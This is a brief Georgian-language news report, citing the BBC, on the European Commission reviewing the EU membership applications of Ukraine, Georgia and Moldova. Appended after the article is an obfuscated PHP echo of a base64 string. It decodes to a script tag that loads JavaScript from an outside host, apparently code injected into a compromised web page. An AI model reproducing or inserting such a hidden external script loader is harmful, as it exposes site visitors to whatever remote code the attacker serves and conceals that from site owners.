celsiusi
ავერსი შნაიდერი
ევროკომისია უკრაინის, საქართველოს და მოლდოვის ევროკავშირში გაწევრიანების განაცხადს განიხილავს.
 
უკრაინის, საქართველოს და მოლდოვას ევროკავშირში გაწევრიანების განაცხდების განხილვას ევროკავშირის ელჩების ორგანიზებით ევროპულმა საბჭომ უნდა მოაწეროს ხელი.
 
BBC-ის ინფორმაციით, აღნიშნული პროცედურა მხოლოდ ფორმალობას წარმოადგენს.
 
ევროკავშირის წევრი ქვეყნების მუდმივმოქმედმა წარმომადგენლებმა ბოლო კვირის განმავლობაში მიღებული განაცხადები დღევანდელ შეხვედრაზე განიხილეს.
 
BBC-ის ცნობით, ისინი შეთანხმდნენ, რომ თითოეული მოსაზრების წარმოსადგენად კომისიას მოიწვევენ.
 
ბრიტანული მედიასაშუალება ასევე აზუსტებს, რომ შესაძლოა აღნიშნული პროცესი დროში გაიწელოს - არ არის გამორიცხული, რომ კომისიას დასკვნის მოსამზადებლად 18 თვე დასჭირდეს. ამასთანავე, თუკი პროცესმა წარმატებით ჩაიარა, სამი ქვეყნის ევროკავშირში გაწევრიანების პროცესი სავარაუდოდ წლების განმავლობაში გაგრძელდება.
755
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");